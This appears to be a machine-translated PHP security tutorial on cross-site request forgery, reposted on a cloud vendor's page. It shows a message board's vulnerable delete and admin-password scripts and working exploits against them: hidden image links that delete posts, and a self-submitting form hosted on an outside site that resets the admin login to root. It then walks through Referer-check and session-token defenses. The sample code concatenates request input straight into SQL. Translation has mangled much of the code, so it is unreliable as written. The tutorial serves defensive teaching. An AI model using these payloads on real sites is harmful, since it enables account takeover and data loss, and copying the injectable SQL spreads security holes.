PHP Vulnerability Full solution (vi)-cross-site request forgery

Source: Internet
Author: User
Tags administrator password
CSRF (Cross site request forgeries), which is intended to be spoofed across Web sites, is also written as XSRF. The attacker forges the HTTP request of the target user and then sends the request to a Web site with a CSRF vulnerability, which causes a cross-site request forgery attack after the Web site executes the request. The attacker uses a covert HTTP connection to allow the target user to click on the link without notice, because the user clicks on it, and the legitimate user has legal rights, so the target user can execute a specific HTTP link within the site to achieve the attacker's purpose.
For example, when buying a product on a shopping site, use the Http://www.shop.com/buy.php?item=watch&num=1,item parameter to determine what item to buy, num parameter determines the quantity to buy, If the attacker sends the link to the target user in a hidden way, the number of purchases will be 1000 if the target user is accidentally accessed.
Instance
V1.0 Network PHP Message Board
Delete any message
delbook.php This page to delete messages
Include_once ("dlyz.php"); dlyz.php user authentication permission, when the permission is admin, can delete message
Include_once (".. /conn.php ");
$del =$_get["Del"];
$id =$_get["id"];
if ($del = = "Data")
{
$ID _dele= implode (",", $_post[' Adid ');
$sql = "Delete from book where ID in (". $ID _dele. ")";
mysql_query ($sql);
}
Else
{
$sql = "Delete from book where id=". $id; Pass the message ID you want to delete
mysql_query ($sql);
}
Mysql_close ($conn);
echo "";
echo "Alert (' Delete succeeded! ’);”;
echo "location= ' book.php ';";
echo "";
?>
When we have admin permission, we will delete the message with ID 2 when we submit http://localhost/manage/delbook.php?id=2.
<iframe allowfullscreen= "true" allowtransparency= "true" frameborder= "0″height=" 60″hspace= "0″id=" Aswift_1″ marginheight= "0″marginwidth=" 0″name= "aswift_1″scrolling=" no "style=" margin:0px; padding:0px; border-width:0px; Vertical-align:baseline; left:0px; Position:absolute; top:0px; "vspace=" 0″width= "468″></iframe> Utilization Method:
We use a regular user message (source code), the content is
"Delbook.php?id=2"/>
"Delbook.php?id=3"/>
"Delbook.php?id=4"/>
"Delbook.php?id=5"/>
Insert 4 Pictures link to delete 4 ID messages Separately, then we go back to the homepage to see, there is no change. The picture doesn't show.
Now we re-login with the administrator account, to refresh the home page, you will find a message left one, the other in the image link designated ID number of the message, all are deleted.
The attacker inserted a hidden picture link in the message, this link has the function of deleting the message, and the attacker's own access to these image links, is not a permission, so see no effect, but when the administrator login, check this message, will execute the hidden link, and his permission is large enough, So the messages were deleted.
Modify Administrator Password
pass.php
if ($_get["Act"])
{
$username =$_post["username"];
$sh =$_post["sh"];
$gg =$_post["GG"];
$title =$_post["title"];
$copyright =$_post["Copyright"].
Design and production: Hacker contract safety net ";
$password =md5 ($_post["password"]);
if (Emptyempty ($_post["password"))
{
$sql = "Update gly set Username= '". $username. "', sh=". $sh. ", gg= '". $gg. "', title= '". $title. "', copyright= '". $copyright. " where Id=1″;
}
Else
{
$sql = "Update gly set Username= '". $username. "', password= '". $password. "', sh=". $sh. ", gg= '". $gg. "', title= '". $title. " , copyright= ' ". $copyright." ' where Id=1″;
}
mysql_query ($sql);
Mysql_close ($conn);
echo "";
echo "Alert (' modified successfully! ’);”;
echo "location= ' pass.php ';";
echo "";
}
This file is used to modify some information about managing passwords and site settings, and we can directly construct the following form:
<body>
<form action= "Http://localhost/manage/pass.php?act=xg" method= "post" name= "form1″id=" form1″>
<input type= "Radio" value= "1″name=" sh ">
<input type= "Radio" name= "sh" checked value= "0″>
<input type= "text" name= "username" value= "root" >
<input type= "password" name= "password" value= "root" >
<input type= "text" name= "title" value= "Online PHP message board V1.0 (with audit function)" >
<textarea name= "GG" rows= "6″cols=" 80″> welcome you to install using the Network PHP message board V1.0 (with audit function)! Textarea>
<textarea name= "Copyright" rows= "6″cols=" 80″> online PHP message V1.0 All rights reserved: Xiamen, Network Technology 2005-2009<br/> undertake website construction and system customization Offer preferential host domain name textarea>
Form>
Body>
Save As attack.html and put it on your website http://www.sectop.com/ attack.html, this page after access will automatically submit parameters to the target program's pass.php, the user name is changed to root, the password is changed to root, and then we go to the message board to send a message, hide this link, management access, his user name and password all changed to root
Precautionary approach
It is more difficult to guard against csrf than to guard against other attacks, because CSRF HTTP requests are made by attackers, but they are issued by the target user, and there are a few common ways to prevent them:
1, check the source of the Web page
2. Check the built-in hidden variables
3, use post, do not use get
Check the page source
Add the following red font code to the//pass.php header to verify data submission
if ($_get["Act"])
{
if (Isset ($_server["Http_referer"))
{
$serverhost = $_server["SERVER_NAME"];
$strurl = Str_replace ("http://", "" ", $_server[" Http_referer "]);
$strdomain = Explode ("/", $strurl);
$sourcehost = $strdomain [0];
if (strncmp ($sourcehost, $serverhost, strlen ($serverhost)))
{
Unset ($_post);
echo "";
echo "alert (' Data source exception! ');";
echo "location= ' index.php ';";
echo "";
}
}
$username =$_post["username"];
$sh =$_post["sh"];
$gg =$_post["GG"];
$title =$_post["title"];
$copyright =$_post["Copyright"].
Design and production: Xiamen, the network Technology ";
$password =md5 ($_post["password"]);
if (Emptyempty ($_post["password"))
{
$sql = "Update gly set Username= '". $username. "', sh=". $sh. ", gg= '". $gg. "', title= '". $title. "', copyright= '". $copyright. " where Id=1″;
}
Else
{
$sql = "Update gly set Username= '". $username. "', password= '". $password. "', sh=". $sh. ", gg= '". $gg. "', title= '". $title. " , copyright= ' ". $copyright." ' where Id=1″;
}
mysql_query ($sql);
Mysql_close ($conn);
echo "";
echo "Alert (' modified successfully! ’);”;
echo "location= ' pass.php ';";
echo "";
}
Check for built-in hidden variables
We built a hidden variable and a session variable in the form, and then checked whether the hidden variable and the session variable were equal to determine whether the same page was called
Php
Include_once ("dlyz.php"); Include_once (".. /conn.php "), if ($_get[" Act "]) {if (!isset ($_session[" post_id "])) {//generates a unique ID and uses MD5 to encrypt $post_id = MD5 (Uniqid (), true));//Create SESSION variable $_session["post_id"] = $post _id;} Check for Equality if (Isset ($_session["post_id"])) {//unequal if ($_session["post_id"]! = $_post["post_id"]) {//Clear post variable unset ($_ echo "<script language= ' JavaScript ' >"; echo "alert (' Data source exception! ');"; echo "location= ' index.php ';"; echo "Script>";}} ... <input type= "reset" name= "Submit2" value= "reset" ><input type= "hidden" name= "post_id" value= "PHP echo $_session ["post_id"];? > ">td>tr>table>form>php}mysql_close ($conn);? ></body>
Use post, do not use get
When passing form fields, be sure to use post, do not use GET, handle variables and do not use $_request directly
The above is the full solution of PHP Vulnerability (vi)-cross-site request forgery content, more relevant content please pay attention to topic.alibabacloud.com (www.php.cn)!
  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.